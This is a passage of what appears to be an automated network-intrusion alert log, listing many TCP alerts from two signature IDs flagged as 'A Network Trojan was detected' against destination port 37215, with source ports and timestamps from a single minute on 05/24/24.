              SID:2835222
              Source Port:33096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125505
              SID:2835222
              Source Port:55308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377450
              SID:2835222
              Source Port:59818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606954
              SID:2835222
              Source Port:37414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250701
              SID:2829579
              Source Port:38410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363193
              SID:2829579
              Source Port:59136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394036
              SID:2835222
              Source Port:60274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576544
              SID:2829579
              Source Port:45000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550514
              SID:2835222
              Source Port:47488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.266365
              SID:2835222
              Source Port:58762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078200
              SID:2829579
              Source Port:43412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599016
              SID:2835222
              Source Port:42196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375018
              SID:2829579
              Source Port:39914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148624
              SID:2829579
              Source Port:47156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.419009
              SID:2829579
              Source Port:43938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119399
              SID:2829579
              Source Port:38394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546483
              SID:2829579
              Source Port:39440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160479
              SID:2829579
              Source Port:42076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727901
              SID:2829579
              Source Port:44106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481376
              SID:2829579
              Source Port:55526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633077
              SID:2835222
              Source Port:33084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397210
              SID:2829579
              Source Port:47468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456811
              SID:2835222
              Source Port:39712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057562
              SID:2835222
              Source Port:37416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535054
              SID:2829579
              Source Port:48842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.883509
              SID:2835222
              Source Port:54768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535977
              SID:2829579
              Source Port:44388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207568
              SID:2835222
              Source Port:44614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634643
              SID:2829579
              Source Port:59840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061783
              SID:2835222
              Source Port:43616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368784
              SID:2835222
              Source Port:49846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195287
              SID:2829579
              Source Port:53110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251634
              SID:2829579
              Source Port:54398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.348065
              SID:2829579
              Source Port:47666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604685
              SID:2829579
              Source Port:55506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279179
              SID:2829579
              Source Port:53496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371955
              SID:2829579
              Source Port:58326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965895
              SID:2829579
              Source Port:56960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433743
              SID:2829579
              Source Port:35192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923310
              SID:2829579
              Source Port:43022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313247
              SID:2829579
              Source Port:48762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061896
              SID:2835222
              Source Port:41968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245234
              SID:2835222
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595465
              SID:2829579
              Source Port:47214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048603
              SID:2829579
              Source Port:59972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663452
              SID:2829579
              Source Port:51062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101639
              SID:2835222
              Source Port:38512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924344
              SID:2835222
              Source Port:43598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858463
              SID:2835222
              Source Port:49412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.567246
              SID:2829579
              Source Port:47104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100556
              SID:2835222
              Source Port:60846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432304
              SID:2835222
              Source Port:47674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640257
              SID:2829579
              Source Port:46874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495282
              SID:2835222
              Source Port:56010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254257
              SID:2835222
              Source Port:35230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878751
              SID:2835222
              Source Port:36304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449875
              SID:2829579
              Source Port:54274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704279
              SID:2835222
              Source Port:59702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638008
              SID:2835222
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284737
              SID:2829579
              Source Port:34822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.585668
              SID:2835222
              Source Port:33946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623445
              SID:2829579
              Source Port:53138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459871
              SID:2835222
              Source Port:60742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452798
              SID:2835222
              Source Port:41966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.767083
              SID:2829579
              Source Port:43304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404530
              SID:2835222
              Source Port:52362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522570
              SID:2829579
              Source Port:37700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278134
              SID:2835222
              Source Port:54618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098102
              SID:2835222
              Source Port:45192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105715
              SID:2829579
              Source Port:35564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207241
              SID:2835222
              Source Port:56462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154873
              SID:2835222
              Source Port:60132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365266
              SID:2829579
              Source Port:46586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480845
              SID:2835222
              Source Port:57828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281687
              SID:2829579
              Source Port:55370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698589
              SID:2829579
              Source Port:42880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801585
              SID:2835222
              Source Port:43492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553188
              SID:2835222
              Source Port:43328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700969
              SID:2829579
              Source Port:33140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664981
              SID:2829579
              Source Port:38472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155055
              SID:2835222
              Source Port:35566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991835
              SID:2829579
              Source Port:42510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.347008
              SID:2835222
              Source Port:45612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078152
              SID:2829579
              Source Port:40700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044386
              SID:2829579
              Source Port:60656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431553
              SID:2829579
              Source Port:56264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457742
              SID:2835222
              Source Port:50040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750566
              SID:2829579
              Source Port:49090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797185
              SID:2829579
              Source Port:60338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576434
              SID:2829579
              Source Port:48854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368569
              SID:2835222
              Source Port:47470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589038
              SID:2829579
              Source Port:40752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601385
              SID:2829579
              Source Port:59606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265856
              SID:2835222
              Source Port:42406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517343
              SID:2829579
              Source Port:40908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538731
              SID:2829579
              Source Port:44032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516609
              SID:2835222
              Source Port:55208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.242017
              SID:2829579
              Source Port:56274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374073
              SID:2835222
              Source Port:60378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586060
              SID:2829579
              Source Port:37704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599137
              SID:2835222
              Source Port:35938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201676
              SID:2835222
              Source Port:54340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116848
              SID:2835222
              Source Port:40102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421633
              SID:2835222
              Source Port:53088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485156
              SID:2835222
              Source Port:40528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.513546
              SID:2835222
              Source Port:52342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671697
              SID:2835222
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075428
              SID:2829579
              Source Port:45388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430110
              SID:2829579
              Source Port:51468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537641
              SID:2835222
              Source Port:45736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411428
              SID:2835222
              Source Port:49196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537748
              SID:2835222
              Source Port:38358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575439
              SID:2835222
              Source Port:34436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374652
              SID:2835222
              Source Port:38820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579669
              SID:2829579
              Source Port:38370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595411
              SID:2829579
              Source Port:55448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481856
              SID:2829579
              Source Port:55506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661297
              SID:2829579
              Source Port:58266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799133
              SID:2835222
              Source Port:45002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163432
              SID:2835222
              Source Port:48300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300018
              SID:2835222
              Source Port:56026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334237
              SID:2835222
              Source Port:41876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071479
              SID:2829579
              Source Port:47336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502556
              SID:2829579
              Source Port:39132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554042
              SID:2835222
              Source Port:50742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692427
              SID:2835222
              Source Port:42540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281494
              SID:2835222
              Source Port:33710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543751
              SID:2829579
              Source Port:42148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341433
              SID:2835222
              Source Port:57116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429777
              SID:2829579
              Source Port:41838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799188
              SID:2829579
              Source Port:49816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456396
              SID:2835222
              Source Port:52354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724630
              SID:2835222
              Source Port:36746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489368
              SID:2829579
              Source Port:38572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355001
              SID:2835222
              Source Port:55922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885287
              SID:2835222
              Source Port:40970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448689
              SID:2829579
              Source Port:40446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622922
              SID:2835222
              Source Port:42634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697011
              SID:2829579
              Source Port:60978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369020
              SID:2829579
              Source Port:33982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411037
              SID:2829579
              Source Port:53258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480925
              SID:2829579
              Source Port:55888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763209
              SID:2829579
              Source Port:43086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543030
              SID:2835222
              Source Port:32946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398327
              SID:2835222
              Source Port:45450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857754
              SID:2835222
              Source Port:49198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606323
              SID:2829579
              Source Port:33490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355187
              SID:2835222
              Source Port:52568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233868
              SID:2829579
              Source Port:60848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542874
              SID:2829579
              Source Port:35538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547287
              SID:2835222
              Source Port:40966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186077
              SID:2835222
              Source Port:42438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100742
              SID:2835222
              Source Port:35192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445782
              SID:2829579
              Source Port:58594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642246
              SID:2829579
              Source Port:33168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400625
              SID:2829579
              Source Port:40462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.518831
              SID:2835222
              Source Port:50786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879320
              SID:2829579
              Source Port:54952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.990751
              SID:2829579
              Source Port:52574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044658
              SID:2829579
              Source Port:41340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270021
              SID:2829579
              Source Port:42712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480118
              SID:2829579
              Source Port:35432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.744838
              SID:2835222
              Source Port:34092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485484
              SID:2829579
              Source Port:36714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548107
              SID:2829579
              Source Port:51266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474128
              SID:2829579
              Source Port:36700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553716
              SID:2835222
              Source Port:46488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502824
              SID:2835222
              Source Port:46642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923605
              SID:2829579
              Source Port:53840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525784
              SID:2829579
              Source Port:52378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481838
              SID:2829579
              Source Port:53770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447983
              SID:2835222
              Source Port:52460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153159
              SID:2835222
              Source Port:45390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506888
              SID:2835222
              Source Port:53974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187963
              SID:2835222
              Source Port:42804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870712
              SID:2829579
              Source Port:50874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282865
              SID:2829579
              Source Port:56588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108001
              SID:2829579
              Source Port:34996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360704
              SID:2829579
              Source Port:58900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396220
              SID:2829579
              Source Port:49774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395933
              SID:2829579
              Source Port:51440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802004
              SID:2829579
              Source Port:43704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.680991
              SID:2835222
              Source Port:51758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543621
              SID:2835222
              Source Port:34224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635980
              SID:2835222
              Source Port:39596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539284
              SID:2829579
              Source Port:48736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504630
              SID:2829579
              Source Port:57436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.826796
              SID:2829579
              Source Port:36858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973615
              SID:2835222
              Source Port:58518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458346
              SID:2835222
              Source Port:35598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804486
              SID:2829579
              Source Port:35270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278699
              SID:2829579
              Source Port:55648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803073
              SID:2829579
              Source Port:59014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450507
              SID:2829579
              Source Port:59226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457842
              SID:2829579
              Source Port:40666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054013
              SID:2835222
              Source Port:46090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397729
              SID:2829579
              Source Port:34948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585165
              SID:2829579
              Source Port:38590
              Destination Port:37215
